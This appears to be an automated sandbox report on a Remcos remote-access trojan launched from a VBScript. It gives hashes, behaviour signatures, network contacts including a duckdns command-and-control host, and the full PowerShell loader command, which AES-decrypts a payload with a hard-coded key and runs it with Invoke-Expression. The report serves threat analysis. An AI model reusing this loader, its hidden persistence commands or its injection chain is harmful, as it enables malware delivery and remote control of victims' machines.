SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b64ff2ae44d032883eee0bf43885c39f
SHA1 baf974d8bec991bbb2a78448df486e3f8feb9eac
SHA256 ca6c601ebd0645e9a7077b3a9e92f684fcb045b8b4632e0a9a452b86e01c9902
SHA512 9860476548a6793f0f48ae45b1ff3b501737dd485e652114a5c0a15793e08d6d56c6f0caaac29866eb929f1bf61b310e973f35dd8f43a1381eab1faf0ef089f3

C:\ProgramData\remcos\registros.dat

MD5 c30f9f6e957182ba5ab8a5e6125858b9
SHA1 de442537779bdafea69e0b2017adc5e382db92ff
SHA256 61672d6d56d78c037afa07f62daa17115ac68c3e04aefd4a4884addfb5de77c8
SHA512 196a62b840aa7f4db1d8ec13562b6833bee7d873cf96fad7a2ae062549a44f42742908afd2ed11f99c6921254f16cf9591ef82aab585096f3dc5af1ad4bb7905

Analysis: behavioral4

Detonation Overview

Submitted

2023-12-05 18:38

Reported

2023-12-05 18:44

Platform

win11-20231128-en

Max time kernel

299s

Max time network

297s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3544 set thread context of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4780 wrote to memory of 3544 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3544 wrote to memory of 1064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '[base64-encoded AES payload elided]';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 188.114.96.0:443 paste.ee tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ck4s2lbx.thz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3544-8-0x0000019FB0280000-0x0000019FB02A2000-memory.dmp

memory/3544-9-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp

memory/3544-10-0x0000019FB0270000-0x0000019FB0280000-memory.dmp

memory/3544-11-0x0000019FB0270000-0x0000019FB0280000-memory.dmp

memory/3544-12-0x0000019FB0270000-0x0000019FB0280000-memory.dmp

memory/3544-13-0x0000019FB0FB0000-0x0000019FB1756000-memory.dmp

memory/3544-15-0x0000019FB0310000-0x0000019FB031C000-memory.dmp

memory/3544-16-0x0000019FB0C30000-0x0000019FB0CA6000-memory.dmp

memory/3544-17-0x0000019FB0D70000-0x0000019FB0D8E000-memory.dmp

memory/1064-18-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp

memory/1064-20-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp

memory/1064-19-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp

memory/1064-29-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp

memory/1064-34-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp

memory/1916-35-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5746a9547ca0d2ff66b8de81e48ddc64
SHA1 6e9cdbbdb0c65caf97fbcd8787d67749b55a6b5f
SHA256 eedb2133a9344f6d8fdc81f8fd710954c165e8d88d9516be400f8a94132a8982
SHA512 f707a525cbb18c297badc0f1187f71aea9b650c7cfdc3ee727093adfa2cab1a83550b842d666e840b6099ccaa4acb5694567317cd62f10359298f720785f0a31

C:\ProgramData\remcos\registros.dat

MD5 da07760c88eb4c4e2b3fca9b87fc5972
SHA1 27cba49a2c23c3a00f6226043661e09ee3e23f63
SHA256 c1cc350e3f0c1de9cd84dc402a2a8f3acdf6a0e7a5a7a9700339d8633312f74d
SHA512 8a76c611ae15b9c7c7faf061966c7c80a4ced75b77d652c8b09af44dc27b23bbfd9544992a9a34c64753c3ad420251e58d3b1743c8f8e64b22027f654e059842
